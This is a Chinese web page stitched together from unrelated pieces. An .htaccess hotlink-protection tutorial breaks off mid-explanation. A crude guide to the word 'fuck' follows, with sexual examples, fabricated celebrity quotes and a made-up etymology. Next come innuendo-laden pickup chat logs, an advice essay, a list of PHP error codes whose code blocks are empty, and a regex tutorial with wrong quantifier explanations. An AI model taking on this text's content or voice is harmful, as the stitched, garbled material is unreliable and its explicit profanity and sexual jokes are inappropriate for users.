使用.htaccess防盗链实战
先解释一下图片防盗链和转向:
图片防盗链有什么用?
防止其它网站盗用你的图片,浪费你宝贵的流量。
图片转向有什么用?
如果你的网站以图片为主,哪天发现月底没到流量就快用光了,那就可以利用图片转向,在不修改网页的前提下,把图片下载请求转向到其它空间(比如试用主机),临时过渡。
下面开始讲解,比如你的图片都在img目录下,那就在该目录下放一个名为 .htaccess 的文件,内容如下:
RewriteCond %{HTTP_REFERER} !^$ [NC]
RewriteCond %{HTTP_REFERER} !oneter.com [NC]
RewriteCond %{HTTP_REFERER} !zhuaxia.com [NC]
RewriteCond %{HTTP_REFERER} !google.com [NC]
RewriteCond %{HTTP_REFERER} !baidu.com [NC]
RewriteCond %{HTTP_REFERER} !bloglines.com [NC]
RewriteRule .(jpg|gif|png|bmp|swf|jpeg) /image/replace.gif [R,NC,L]
RewriteRule ^(.*)$ http:\/\/image.simcole.cn\/image\/$1 [L]
大概解释下:
RewriteCond %{HTTP_REFERER} !oneter.com [NC]
RewriteCond %{HTTP_REFERER} !zhuaxia.com [NC]
RewriteCond %{HTTP_REFERER} !google.com [NC]
RewriteCond %{HTTP_REFERER} !baidu.com [NC]
RewriteCond %{HTTP_REFERER} !bloglines.com [NC]
这部分是判断是否盗链,如果以上条件都成立(即访问图片的请求,既不是直接输入网址,也不是来自simcole.cn,也不是来自 zhuaxia.com,也不是来自google.com,也不是来自baidu.com,也不是来自bloglines.com 的话),就执行下列转向:
意思是让所有盗链 img 目录下 jpg、gif、png、bmp、swf、jpeg 文件的网页,显示的图片都用 image 目录下的 replace.gif 图片替换掉。注意替换显示的图片不要放在设置防盗链的 img 目录下。如果照上面的规则判断出图片请求不是盗链的,就执行以下转向:
be fucked
严格的语法上来说呢,这个就是fuck的被动语态,8过实际应用中只要不是很顺心的状况呢,都可以用。一般对人不对事。有人倒霉了,基本上就是he's fucked了。
fucking
语法中有动词进行式做形容词的用法。这个fuck一加上ing的话就是包治百病天下无双了……基本上所有的名词都可以形容。最为顺口的就是fucking asshole了。
fuck you
最常见的用法,矛头直指对方,快意恩仇。发音简单一学就会,一句在口可以走遍美国了。如果跟对方没什么计较的话fuck哪个也都可以,fuck him, fuck her, fuck them, fuck the states, fuck the world, 不过总是没有fuck you来得理直气壮言简意赅。
fuck me
嘿嘿,这个,一般只在特定场合特定行为中由特定人物表达。简单来说,就是女性叫床专用……各位同学大家知道就可以了,这个,不用反复操练的……
fuck up
搞砸了,一般对事不对人,类似表达可以用screw up。
fuck off
收声闭嘴之极度表达。以程度类推效果大于hold your tounge大于shut up大于watch your mouth。
fuck with nb.
对某人找茬,故意戏弄某人。这个……大家千万不要误解为与某人XX……
fuck you very much
这里的fuck you就比较活络了。不看语气和表情就很难判断对方的意图。因为他很有可能是在用另外一种方式说“thank you very much”。
motherfucker
跟老外比起来我们中华民族泱泱大国就文明多了。就算问候对方家长也是身体力行,或者“X你妈”或者“X你大爷”,老外比较懒,这些事情也都交给被骂的家伙去办了……
"Fuck" 是现代英语中最强烈,最有争议的粗语之一,这个词可能也是世界上最著名的亵渎语但何时这个词从一个友好用法变成亵渎用法却仍然无法解释一些证明显示,在一些英语为母语的地区,这个词直到17世纪才有一种攻击和亵渎的含义; 而另外一些证明却表明,早在16世纪的英国,这个词已经变成粗语因此一些诸如牛津大英字典的权威资料仍然无法确定这个粗语的来源,但倾向于相信撒克逊人 (英国人)起源说,然后再流传到英国殖民地,再到全世界
在现代英语中,"Fuck"是一种高度冒犯性的用词,是最为严厉的4字母词"Fuck" 原意就是XXXXX(操,干),但它往往被用作一个咒骂语和语气加强词一些"Fuck"原意的例子有:
"Let s fuck." (让我们操吧)
"That was a good fuck." (那真是一次美妙的XXXXX)
"I cant believe shes fucking him!" (我不能相信她正在操他!)
"I fucked my teacher!" (我干了我老师)
其他则是一些粗直语用法,但这些用法往往牵涉到性,譬如XXXXXX(fuck you)或者自慰(fuck yourself).
"Fuck you!" or "Go fuck yourself!" (我不喜欢你,快滚开)
"He"s a dumb fuck." (他是个白痴)
"Sorry, I fucked up your computer." (不好意思,我弄坏了你的电脑)
"He s pretty fucked up." (他心理或者心情不稳定)
"I fucked up on this test." (我这次测验做的很糟)
"Lets fuck around for a couple hours." (让我们浪费2个小时好了)
"Im fucked." (结果)
"What the fuck!" (到底刚才发生了什么?)
"Shut the fuck up!" (闭嘴)
"Im so fucked up right now." (我已经烂醉或者被药物搞的晕晕乎乎了)
其他一些粗直用法则没有任何冒犯或者牵涉到性的意思而且当这个词被移除之后,这句句子的语意仍然保持不变譬如:
"None of your fucking business!" (不关你"鸟"事)
"Un-fucking-believable!" (真难以置信!)
"What a fucking great day outside!" (外边的天气真"他妈的"的好)
2 fuck的用法小结
"Shut the fuck up!" (你他妈的闭嘴
"Abso-fuckin-lutley!" "绝对是!"
"Hey!, Why dont you go outside and play Hide-N-Go-Fuck-Yourself!" "嘿,为什么你不出去自己一个人玩?
"Fuck!" (当一些不快的事情发生)
"Hes a great fucker!" (他是一个非常好的家伙,并不意思他是一个非常好的性伙伴)
在最后一个例子中,"Fucker"这个词被用作一种赞赏,但这种用法并不常见譬如: "You are a smart fucker (你是一个聪明的家伙)". 但正因为这种用法的粗鲁及不明确性, 除非对方是一个你非常熟悉的朋友,这个用法还是不要用的好因为有可能你的赞赏会被误解
"Fuck"这个词也是非常多样化的,譬如:
"Fucking fuck those fucking fuckers!" ("忘记那些另人讨厌的家伙吧.") "Fucking fuckers fucking fucked!" ("它被弄坏了")
第二个例子很好的演示了这个词的多样性,它是一个名词,一个冠词,一个现在分词和一个形容词另外一个可以显示其多样性的例子是Mary Prankster 的歌:Mercyfuck (1998)
I wish I could fuck all my sorrow away
And fuck til the dawn of the next fucking day
Fuck the chorus and verse, fuck the pain getting worse
Fuck it all til I burn
I wish I could fuck all of you til you see
Im the worst fuck-up in all history
Fuck your image and mine, fuck your limp valentine
Fuck it all til I learn
再补充一下"Fuck"这个词的常用法:
动词
可以当作一个及物动词:
He fucked her. (他操了她.)
或者不及物动词:
They fucked all night. (他们干了整个晚上)
或者对象非人的用法:
Im not going down there, fuck that, dude! (我不会下去的,操那东西,哥们!)
Im not doing that. Fuck outta here! (我不会做的,忘记它吧!)
名词
She is a real fuck. (没有特定的侮辱)
She is a good fuck. (特定的指向XXXXXX)
Eat my fuck. (是一种侮辱)
We had a good fuck last night. (作为一个性行为)
That was a total cluster fuck. (很多出错的事的当中一个)
Oh my fuck! (表明一种惊讶的意思)
Im being sent to Bumfuckegypt. (很有可能出自一个军事源头)
感叹词
Fuck作为感叹词时一般表示一种惊讶,不满或者愤怒的意思, 如:
Fuck! A punctured tire!
也可以表示一种正向的惊讶:
Fuck! Theyve hacked this computer! (噢!他们黑了这台电脑!)
Fuck! This is the best movie EVER! (噢!这是历史上最好的电影!)
现在分词
作为现在分词,Fucking (fuckin) 往往用来加强一个动词或者名词的语气它的正向意义往往多于其反向意义如:
My fucking boss made me work all weekend. (我那天杀的老板让我加整个周末的班)
She is fuckin hot. (她真他妈的性感)
除此之外,Fuck的现在分词有时被插在一个词的中间这种用法叫作感叹插入语. 这种fucking插入法的规则是: "fucking"只能插入到一个多音节词的韵脚之间, 例如:
that was abso-fuckin-lutely cool! (那真他妈的酷!)
In-fucking-credible (难以置信)
fan-fucking-tastic (真棒)
un-fucking-believable (无法相信)
congratu-fucking-lations (祝贺祝贺)
whoop-dee-fucking-doo (%@@#@#)
过去分词
fuck的过去分词意思一样完全无用的,被损坏的,或者被搞糟的事物在形容一个人的时候,它表示一种筋疲力尽或者烂醉的意思 譬如:
The hard drive 无效ed, so now the database is fucked. (硬盘坏了所以现在数据库也被损坏了)
Your engines fucked because you forgot to change the oil! (你的引擎坏了,因你忘记换油了)
Now that the electricity is out, your computer is fucked. (没电了,你的电脑没用了)
3 fuck的用法小结
You were completely fucked last night. (你昨晚真是糟糕透了)
动词短语
"To fuck up"意思是破坏,"to be fucked up"往往意思烂醉,或者更正规的意思是身体或者心理上的伤害(常用于美国) 如:
The bouncer really fucked up that guy who kept causing trouble. (那个保镖把那个老是滋事的家伙打的够呛)
My sisters been really fucked up since her fiancé dumped her. 我的姐姐(妹妹)惨极了,因为她的未婚夫抛弃了她
当在形容事物的时候,"to be fucked up"意思是这件事物是精神上或者其他方面上错误的
She stole my wallet while I was passed out; thats so fucked up! (在我走出去的时候,她偷了我的钱包;那绝对是件错误的事)
"To fuck over" 意思背叛,或者通常不讨人喜欢的行为
Yeah, he slept with my girlfriend. I cant believe he fucked me over like that! (他睡了我GF,我真的无法相信他如此背叛我!)
I got fucked over at work today – they promoted my assistant instead of me. (今天我在上班的时候被玩了: 他们提升了我助理,而不是我!)
混成词
F的发音有时被提高语调,以表示强烈的辱骂
Thats fugly (fucking ugly). (那真他妈的丑)
You fucktard (fucking retard). (你他妈的智障)
You flooser! (fucking loser) (你他妈的失败者)
讲演语气
Fuck有时在讲演时被用作一种填补,用法很象um..., 或者like..
Her name is, fuck... What was her name again? (她的名字是,恩,她的名字是什么?)
the fuck 常用来加强语气,类似于“到底”、“究竟”、“the heck”、“on
earth”
、“the hell”等,在疑问词后。
例1 熟人间的问候: "How the fuck are ya?"
例2 疑问: "What the fuck is(are).......?"
例3 不满: "What the fuck is going on here?"
例4 迷惘: "Where the fuck are we."
例5 担心: "Let's get the fuck out of here."
例6 怀疑: "How the fuck did you do that?"
get fucked , be fucked 被骗;遇到麻烦
例7: "I got fucked by the car dealer."
例8: "I guess I'm fucked now."
Fucked again 表示绝望,“完了……”
Fuck it 屈从,放弃
例9: "Oh, fuck it!"
Fuck you ! 不用多解释了
Fuck me. 表示厌恶 类似“sth disgusts me”
fucking 类似 the fuck ,作加强语气,不过还可作形容词,表示一些不爽的事物
例10: "I don't understand this fucking business!"
例11:根本不想 "I didn't fucking do it."
例12:骂人反击 "Up your fucking arse!"
"He's a fucking asshole."
例13:当然也有表示高兴的时候,类似于“我他妈……” "I fucking couldn't
be ha
ppier."
例14:放在一个词的中间(注意这种用法哦,国内较少见)增强语气:
"UNFUCKINGBELI
EVABLE!"
例15:表示时间 "It's five fucking thirty."
Fuck off. “滚开” 类似“go away”
Fuck around. 胡闹 “Quit ye fucking around!”
Fuck up. 弄砸了 “How did you fuck your exam up?”
Fuck with 干涉 类似于“interfere with”
be fucked out 疲劳的,类似于“exhausted”
fuck 单独的用法:
例16:几乎 "I know fuck all about it."
例17: 谁在乎过我了?"Who really gives a fuck, anyhow?"
FUCK 一词并不邪恶,没有一些女生想象的那么坏,它在美国人的口语中出现的频
率很高,就如同我们常说的“我KAO”。下面列举了一些名人说话中用过的FUCK:
广岛市市长 "What the fuck was that?"
4 fuck的用法小结
Custer 上将 "Where did all these fucking Indians come from?"
泰坦尼克号船长 "Where the fuck is all this water coming from?"
约翰.列农 "That‘s not a real fucking gun."
尼克森总统 "Who‘s gonna fucking find out?"
航天飞机的指挥官 "Let the fucking woman drive."
爱因斯坦"Any fucking idiot could understand that."
毕加索 "It does so fucking look like her!"
沃尔特.迪斯尼 "Fuck a duck."
艾德门德.希拉里 "Why?- Because its fucking there!"
约翰.肯尼迪 "I need this parade like I need a fucking hole in my
head."
perhaps one of the most interesting words in the English Language today is the word "Fuck".
也许英文中最有趣的单词之一就是今天要讲的Fuck。
Out of all of the English words that begin with the letter "F", Fuck is the only word that is refer to as the F-Word.
在所有以F开头的英文单词中,Fuck是唯一会被称为“那个以F开头的单词”。
It"s the one magical word just by its sound can describe pain, pleasure, hate and love.
这是一个神奇的词,仅仅通过它的发音就可以表达痛苦、愉悦、仇恨和喜爱。
Fuck, as most words in the English language is derived from German the word "frichen" which means "to strike".
Fuck正如大多数英语单词一样,来源于一个德语单词"Frichen",这个单词的意思是“击打”。
In English Fuck falls into many grammatical categories.
在英语中,Fuck又有多种用法。
As a transitive verb , for instance, "John Fucked Shirley"; as a intransitive verb, "Shirley Fucks. "
作为一个及物动词,例如,John**Shirley;作为一个不及物动词,Shirley***。
Its meanings not always sexual.
它的意思并不总是和性有关。
It can be used as an adjective such as "John"s doing all the Fucking work".
它可以作为一个形容词,例如:John正在做所有TMD该死的工作。
As an adverb, "Shirley talks too Fucking much."
作为一个副词,Shirley的话真是太TMD多了。
As an adverb enhancing and adjective, "Shirley is Fucking beautiful".
作为副词或形容词时如果用升调读出,Shirley真是太TMD漂亮了。
As a noun, "I don"t give a Fuck".
作为一个名词,我才不TMD管那么多。
As part of a word, "abso-Fucking-lutely" or "in-Fucking-credible".
作为词语的一部分,如TMD完全的,TMD难以置信的。
And as almost every word in a sentence "Fuck the Fucking Fuckers".
也可以被放在同一个句子中,**这个**的**
As you must realise there aren"t too many words with the versatility of Fuck, as in these examples describing situations such as:
你应该注意到了,没有太多的单词像Fuck这样有多种功能,在如下的例子中描述不同的情况,如:
Fraud : "I got Fucked by the car dealer."
受骗:我被车贩子骗了。
Dismay: "Ah Fuck it" .
沮丧:我*
Trouble: "I guess I"m really Fucked now" .
麻烦:我猜我这次真的栽了。
Aggression: "Don"t Fuck with me body" .
挑衅:小子,不关你的事。
Difficulty: "I don"t understand this Fucking question"
困难:我不明白这个TMD问题。
Inquiry: "Who the Fuck was that?"
质疑:那TMD是谁?
Dissatisfaction: "I don"t like what the Fuck is going on here"
不满:我不喜欢这里正在发生的$%$&%^&
Incompetence: "He"s a Fuck up"
无奈:他就是一个**
Dismissal: "Why don"t you go outside and play hide and go Fuck yourself?"
打发:你为什么不出去$^$^#^#
I"m sure you can think of much more examples.
我肯定你还可以想到更多例子。
With all of these multipurpose applications, how can anyone be offended when you use the word?
在各种各样的情况下,怎么用这个词得罪别人呢?
We say use this unique flexible word more often in your daily speech.
我们可以在日常对话中更多的使用这个唯一的多样的词。
It will identify the quality of your character immediately.
它能立即让你显得有性格。
Say it loudly and proudly——FUCK YOU!
牛人泡妞的聊天记录,每句都出彩啊
偶然间听到爆笑谷的大名,据说此人不但具备周星星同学无厘头搞笑风格,其文学修养,综合实力等更是无人能敌,迷倒了一大批MM。不愧是网络第一泡妞高手呀!后来我一搜索爆笑谷三个字就找到了一大堆他的经典泡妞语录。我把这些泡妞语录背熟以后,在聊天室中如鱼得水,投怀送抱的MM不计其数。以下是他的经典泡妞聊天记录,口笨的朋友可以学习一下。有种的高手可以向他挑战,把你们泡MM的经典语录也发上来,让大家看看哪个才是泡妞界的高手。
蓝精灵:你到底是一个怎样的男人呢?
爆笑谷:嗯,世界上所有语言都是难以评价的
蓝精灵:这么拽?
爆笑谷:只有用你的肢体来触摸,才能感受得到我的好
蓝精灵:恶心!
爆笑谷:其实我这个人真的很不错,是运动型的男人
蓝精灵:真的吗?
爆笑谷:我喜欢一切运动
蓝精灵:好,我欣赏
爆笑谷:尤其喜欢床上运动
蓝精灵:色狼!
爆笑谷:我说的是在床上练瑜伽,你想什么哪?
蓝精灵:呸!
爆笑谷:我还喜欢一切圆的球类
蓝精灵:什么球?
爆笑谷:尤其是女人身上的两个球!
蓝精灵:!!又来了
爆笑谷:我说的是女人的眼球,明眸善睐,多美啊!
蓝精灵:晕!
爆笑谷:没关系了,知道你是个美女,所以我很喜欢你了,尤其是你身上的两个球…
蓝精灵:呸呸!!
爆笑谷:我说的是真的哟
蓝精灵:我发现我对你也开始有了一种无法言表的、异样的感觉……
爆笑谷:耶!我一直以为我对你是自作多情,看来还没有了,呼呼
蓝精灵:当然不是自作多情,根本就是一厢情愿嘛!
爆笑谷:啊!你不是说有感觉吗?
蓝精灵:是啊,有感觉,一种想吐的感觉!!
----------------------------------------------------------------------------------------------------------------
蓝精灵:好无聊呀
爆笑谷:是啊,我也觉得无聊
蓝精灵:对一切都失去了兴趣了
爆笑谷:生活失去了颜色
蓝精灵:对,一片空白
爆笑谷:偶尔,有点黄色了,嘿嘿
蓝精灵:打你头!
爆笑谷:打破的话,就会多了一点红色~~
蓝精灵:我和男朋友分手了!
爆笑谷:恭喜
蓝精灵:不用了,知道你想恭喜我解脱了
爆笑谷:错!我是恭喜你男朋友终于摆脱你了!
蓝精灵:你!!!
爆笑谷:分开其实很好
蓝精灵:是吗
爆笑谷:女人的容貌是别人的,女人的知识是别人的,女人的身体也是别人的,只有快乐是自己的
蓝精灵:有点意思
爆笑谷:男人更惨
蓝精灵:怎么惨了?
爆笑谷:男人的钱包是老婆的,男人的智慧是老婆的,男人的身体也是老婆的
蓝精灵:快乐是自己的?
爆笑谷:男人有了老婆,哪里还有快乐?!
蓝精灵:好可怜啊,那男人总得有不属于老婆的地方吧
爆笑谷:是啊,和老婆在一起的时候,心却是属于别的MM的
蓝精灵:是吗?
爆笑谷:心里想着别的MMSC时的样子……
蓝精灵:啊?!
爆笑谷:我是说别的MMSC翻筋斗时的样子!
蓝精灵:晕!
-------------------------------------------------------------------------------------------------
云边之雪:你在吗?怎么不见你上线?
爆笑谷:心无时不跳,我无处不在。
云边之雪:原来是个“隐君子”
爆笑谷:隐名免灾祸,隐身免烦恼。
云边之雪:不知道“小隐于野,大隐于市”吗?
爆笑谷:知人知面不知心,隐名隐身难隐情。
云边之雪:哇,好难懂啊,你学哲学的?
爆笑谷:学文学的都是傻子,学哲学的都是疯子。
云边之雪:真精辟啊,你是不是经常这样在网上泡妞?
爆笑谷:流汗流血不流泪,泡茶泡吧不泡妞。
云边之雪:好酷呀,可是人不可能没有感情呀!
爆笑谷:蒸桑拿蒸馒头不争名利,弹吉它弹棉花不谈感情
云边之雪:我开始流汗了,你真是个牛人!
爆笑谷:玩什么都别玩爱情,信什么也别信男人。
云边之雪:嗯,至理名言,你受过感情的伤呀?
爆笑谷:爱有多深,恨有多深。
云边之雪:怎么感觉那么沧桑啊。
爆笑谷:女人因为成熟而沧桑,男人因为沧桑而成熟。
云边之雪:有点难懂,但又很有道理。
爆笑谷:男人善于花言巧语,女人喜欢花前月下。
云边之雪:你是怪物吧!
爆笑谷:每个人都是怪物,每句话都是真理。
云边之雪:天啊,和你生活在一起会累死了,肯定没人会嫁给你。
爆笑谷:笨男人要结婚,笨女人要减肥。
云边之雪:我要哭了!
爆笑谷:爱与恨都是寂寞的空气,哭与笑表达同样的意义。
云边之雪:哭和笑怎么能一样,去死吧!
爆笑谷:苦与乐都是财富,生与死都要绚丽。
云边之雪:和你说话真累,其实你不懂女人心。
爆笑谷:女人希望男人表露心灵,男人希望女人裸露身体。
云边之雪:嗯这句话有道理,你有没有女朋友?
爆笑谷:黄脸老婆易寻,红颜知己难觅。
云边之雪:和你结婚会不会开心?
爆笑谷:男人的痛苦从结婚开始,女人的痛苦从认识男人开始。
云边之雪:天啊,那还是不要接近你了……
爆笑谷:最易接近的是身体,最难接近的是心灵。
云边之雪:你喜欢怎样的女孩子?
爆笑谷:女人喜欢的男人越成熟越好,男人喜欢的女孩越单纯越好。
云边之雪:不是吧,我怎么听说男人对不单纯的女人也感兴趣?
爆笑谷:好男人应在床上勇猛,好女人应在床上放荡。
云边之雪:哈哈色狼的尾巴露出来了!
爆笑谷:男人好色称为色狼,男人不好色称为色盲。
云边之雪:你讲话很搞笑呀。
爆笑谷:世间纷繁万般无奈,心头只求片刻安宁
云边之雪:下次还能和你聊吗?
爆笑谷:做男人无能会使女人寄希望于未来,做女人失败会使男人寄思念于过去
云边之雪:哈哈,你的意思是我们现在就见面?
爆笑谷:心动不如行动,说到不如做到。
云边之雪:OK,我决定了,去见你!
爆笑谷:有缘人终成正果,有情人终成网友!
----------------------------------------------------------------------------------------------------------------------
蓝精灵:你为什么总是隐身啊?
爆笑谷:怕被美女骚扰啊
蓝精灵:拽吧你,你以为你是谁啊?
爆笑谷:我很优秀的,一个优秀的男人,不需要华丽的外表,不需要有渊博的知识,不需要有沉重的钱袋,只要他的思想够丰富,学会在茫茫网络中隐藏自己的锋芒,就足够了…
蓝精灵:哇,高人啊!
爆笑谷:不错,本人不矮,1米85
蓝精灵:你真是一个优秀的男人吗?
爆笑谷:当然,我从小就很优秀,小学到初中,一直在班里任重要职务
蓝精灵:班长?
爆笑谷:卫生小组组长。
蓝精灵:真的好重要哇~~
爆笑谷:相信你也是一个很优秀的人
蓝精灵:嗯,想想,从小到大,倒是得了不少荣誉
爆笑谷:说说看
蓝精灵:小学时候得到讲故事大赛第三名
爆笑谷:一共3个人参加吧!
蓝精灵:中学时候长跑考试得了一次第一
爆笑谷:倒数的吧
蓝精灵:我写的文章都在学校公开栏展出
爆笑谷:写的检查吧
蓝精灵:大学时候还参
加过学校舞台剧的演出,从第一场到最后一场,我全都出场了…
爆笑谷:演一块石头吧……
蓝精灵:现在人们还都说我是一个才女呢
爆笑谷:嗯,你是做裁缝的吧,裁女!
蓝精灵:555,居然全被你猜中了!
------------------------------------------------------------------------------------------------------------------------
冰玫瑰:男人跟女人聊天,是不是都怀有什么目的
爆笑谷:是啊,所有的男人都只有一个目的,就是把女人聊SC
冰玫瑰:啊!
爆笑谷:当然了,我跟别人男人是不一样的
冰玫瑰:你的目的是?
爆笑谷:让女人把我聊SC!!
冰玫瑰:你好厉害,你成功了几个?
爆笑谷:数数啊,嗯,大约有一百多个吧!
冰玫瑰:啊,那么多,不会吧,怎么做的?
爆笑谷:常常都是聊到深夜,然后我对女网友说,你真会聊,厉害,我不行了,今天我已经很困了,我要SC去睡觉了!然后,我就SC去睡觉了……
爆笑谷:好
妹红雷:好
爆笑谷:聊吗
妹红雷:不
爆笑谷:为什么
妹红雷:忙
爆笑谷:忙什么
妹红雷:玩
爆笑谷:玩什么
妹红雷:游戏
爆笑谷:什么游戏
妹红雷:好玩的
爆笑谷:什么好玩的
妹红雷:烦
爆笑谷:烦就跟我聊
妹红雷:滚
爆笑谷:地不干净
妹红雷:靠
爆笑谷:给你肩膀
妹红雷:找死啊
爆笑谷:“死”在字典961页
妹红雷:晕
爆笑谷:我有止晕药
妹红雷:我服了
爆笑谷:服了药就不晕了
妹红雷:大哥
爆笑谷:认你这个妹妹了
妹红雷:拜托
爆笑谷:拜可以,不用脱
妹红雷:我要疯了
爆笑谷:我打120
妹红雷:你神仙
爆笑谷:不要迷信
妹红雷:还让人活吗
爆笑谷:有了我你会活得更精彩
妹红雷:555
爆笑谷:三五香烟虽好,但有害健康
妹红雷:去死吧
爆笑谷:我在网吧,不是死吧
妹红雷:求你放过我
爆笑谷:好,告诉我手机号我就不说了
妹红雷:要号干嘛
爆笑谷:改给你发短信
你必须把那些浮如飘絮的思绪,渐渐转化为清晰的思路和简单的文字。华丽和漂浮都不易长久。你要知道,给予文字阅读快感是不够的,内容,思想,境界,灵魂,精神和智慧,这些才重要。
不要多看那些和你一个路数的女作家的文字。不要琐碎,无病呻吟。不要想到什么就写。不要流于小感伤和小感动。
女孩,我要你相信温暖,美好,信任,尊严,坚强这些老掉牙的字眼。我不要你颓废,空虚,迷茫,糟践自己,伤害别人。我不要你把自己处理得一团糟。
节制自己的感情。不是任何人都能要。体验生活,是另外一回事,并不意味着堕落和放纵。
千万不要认同那些伪装的酷和另类。他们是无事可做的人找出来放任自己无事可做 的借口。真正的酷是在内心。
你要有强大的内心。要有任凭时间流逝,不会磨折和屈服的信念。
不是因为在象牙塔中,才说出我爱世界这样的话。是知道外面的黑,脏,丑陋之后,还要说出这样的话。
女孩,好好去爱,去生活。青春如此短暂,不要叹老。偶尔可以停下来休息,但是别蹲下来张望。走了一条路的时候,记得别回头看。
时不时问问自己,自己在干吗。 伤心和委屈的时候,要嚎啕大哭。哭完洗完脸,拍拍自己的脸,挤出一个微笑给 自己看。不要揉,否则第二天早上会眼睛肿。
给自己一个远大的前程和目标。记得常常仰望天空。记住仰望天空的时候也看看脚下。
任何时候,任何人问你,有过多少次恋爱,答案是两次。一次是他爱我,我不爱他。一次是我爱他,他不爱我。好的爱情永远在下一次。别给同一个男人两次伤害你的机会。
不要为欲望羞耻,好好享受,但绝不忍受男人的侮辱和怠慢。
相信我,女孩,男人多的是,比三条腿的青蛙多得多。别轻易说出“爱”。
相信你的直觉。
不要招惹别人的男人,除非你非常非常爱他,并且,他非常非常值得爱。
不要招惹寻找与前女友相似,和他母亲,姐姐相似女人的男人。不要招惹浪子,文艺青年和中年男子。别招惹太清纯的男人。别和没心没肺的人在一起。
别把犯贱当真爱。一个男人作践自己来取悦你的时候,千万不要因此感动。这个烟头烫在他身上,下一个就可能烫在你身上。
看看一个男人的朋友们是什么样的,注意他的朋友们对待女人的态度。还有,千万别相信一个不准备将你介绍给他的朋友圈子的男人。一个男人只肯喊你“宝贝”的时候,坚持要他喊你的名字。一个男人不再来找你的时候,就不要再去找他。
不要相信在恋爱上用手段的人。分手时不要口出恶言。吸取教训,但不要后悔。后悔没有用。 别干撕照片,烧信,撕日记这样一类三流爱情电视剧中才有人干的事。
相信爱情。相信好男人还存在,还未婚,还在茫茫人海中寻觅你。千万别说“男人没一个好东西”这样使别人误以为你阅人无数的话。
答应我,永远不要去做那种午夜背着行李,从一个男朋友家,流落到另一个男朋友家的女人。
爱物质,适当地。永远知道精神更重要。比那些名表,名牌,时装,更加美丽的是你自己。
别瞧不起劳动人民。不要为劳动羞耻。土地不脏,汗味不难闻。尊重那些似乎生活状况不如你的人,因为这样才是尊重自己。永远体恤那些生活在底层的人们。我们,并不特别娇贵。
不要小看一分钱。不妨自己去挣挣看。
被朋友伤害了的时候,别怀疑友情,但提防背叛你的人。原谅,但并不遗忘。做人存几分天真童心,对朋友保持一些侠义之情。
要快乐,要开朗,要坚韧,要温暖。这和性格无关。
我担心你太沉默,有时要强悍一点,被欺负的时候,一定要讨回来!但是不要记恨。小人之见,随他们去好了。怜悯,会使你高贵。
最后, 要原谅这世界和自己。要告诉自己,你值得拥有最好的一切。
一些错误代码含义详解
错误类型:
一、未使用二进制上传
| 代码: | [拷贝到剪贴板] | |
| ||
二、数据表中缺少字段
| 代码: | [拷贝到剪贴板] | |
| ||
三、服务器限制了网站使用内存的大小为8M,现在已经超过
| 代码: | [拷贝到剪贴板] | |
| ||
五、数据库表不存在
| 代码: | [拷贝到剪贴板] | |
| ||
六、 未安装或者数据库的用户名密码错误
| 代码: | [拷贝到剪贴板] | |
| ||
七、查询语句有错误
| 代码: | [拷贝到剪贴板] | |
| ||
八、文件过期
| 代码: | [拷贝到剪贴板] | |
| ||
九、数据库出错,需要修复数据库或者重新启动数据库?
| 代码: | [拷贝到剪贴板] | |
| ||
十、
| 代码: | [拷贝到剪贴板] | |
| ||
十一、这是语言管理中的language表里面有些字段没有引号,有些新增模块有这样的问题
| 代码: | [拷贝到剪贴板] | |
| ||
出现错误的查询信息是
UPDATE boka_language
十二、不存在此函数
| 代码: | [拷贝到剪贴板] | |
| ||
十三、服务器执行时间超时.修改php.ini里的设置
| 代码: | [拷贝到剪贴板] | |
| ||
十四、调用了不存在的类
| 代码: | [拷贝到剪贴板] | |
| ||
十五、ZEND版本不匹配?
| 代码: | [拷贝到剪贴板] | |
| ||
十六、不能建立windows下的Mysql服务进程
| 代码: | [拷贝到剪贴板] | |
| ||
十七、数据表错误,修复数据表.(检查数据库的表。通过phpmyadmin即可修复)
| 代码: | [拷贝到剪贴板] | |
| ||
十七,环境zend未安装
| 代码: | [拷贝到剪贴板] | |
| ||
十八,安装是没有任何反应,输入install.php面空白。
环境错误提示被屏蔽,察看文件是否用二进制传送或者是zend是否有安装。
十九、数据库出现
| 代码: | [拷贝到剪贴板] | |
| ||
数据库链接数太多,修改mysql的最大链接数。
二十、输入安装install.php提示
install.php 不允许执行原因是:
脚本权限错误:不能设置为同组可写!
服务器端配置:
Server Administrator/Contact: [no address given]
Server Name: www.***.com
Server Port: 80
Server Protocol: HTTP/1.1
访问请求数据:
User Agent/Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Request Method: GET
Remote Address: 221.222.177.106
Remote Port: 30066
请检查install.php的文件属性是否为644。
二十一、访问页面提示:
| 代码: | [拷贝到剪贴板] | |
| ||
这个错误是由于数据库恢复不正常。请核实2个数据库的版本是否一致。
二十二、在2003下执行install.php文件,点击"下一步"的按钮点击不下去.
请检查2003下的IE的安全设置为中。
跟我学正则表达式! 半小时精通正则表达式!
开篇,还是得说说 ^ 和 $ 他们是分别用来匹配字符串的开始和结束,以下分别举例说明
"^The": 开头一定要有"The"字符串;
"of despair$": 结尾一定要有"of despair" 的字符串;
那么,
"^abc$": 就是要求以abc开头和以abc结尾的字符串,实际上是只有abc匹配
"notice": 匹配包含notice的字符串
你可以看见如果你没有用我们提到的两个字符(最后一个例子),就是说 模式(正则表达式) 可以出现在被检验字符串的任何地方,你没有把他锁定到两边
接着,说说 '*', '+',和 '?',
他们用来表示一个字符可以出现的次数或者顺序. 他们分别表示:
"zero or more"相当于{0,},
"one or more"相当于{1,},
"zero or one."相当于{0,1}, 这里是一些例子:
"ab*": 和ab{0,}同义,匹配以a开头,后面可以接0个或者N个b组成的字符串("a", "ab", "abbb", 等);
"ab+": 和ab{1,}同义,同上条一样,但最少要有一个b存在 ("ab", "abbb", 等.);
"ab?":和ab{0,1}同义,可以没有或者只有一个b;
"a?b+$": 匹配以一个或者0个a再加上一个以上的b结尾的字符串.
要点, '*', '+',和 '?'只管它前面那个字符.
你也可以在大括号里面限制字符出现的个数,比如
"ab{2}": 要求a后面一定要跟两个b(一个也不能少)("abb");
"ab{2,}": 要求a后面一定要有两个或者两个以上b(如"abb", "abbbb", 等.);
"ab{3,5}": 要求a后面可以有2-5个b("abbb", "abbbb", or "abbbbb").
现在我们把一定几个字符放到小括号里,比如:
"a(bc)*": 匹配 a 后面跟0个或者一个"bc";
"a(bc){1,5}": 一个到5个 "bc."
还有一个字符 '│', 相当于OR 操作:
"hi│hello": 匹配含有"hi" 或者 "hello" 的 字符串;
"(b│cd)ef": 匹配含有 "bef" 或者 "cdef"的字符串;
"(a│b)*c": 匹配含有这样多个(包括0个)a或b,后面跟一个c
的字符串;
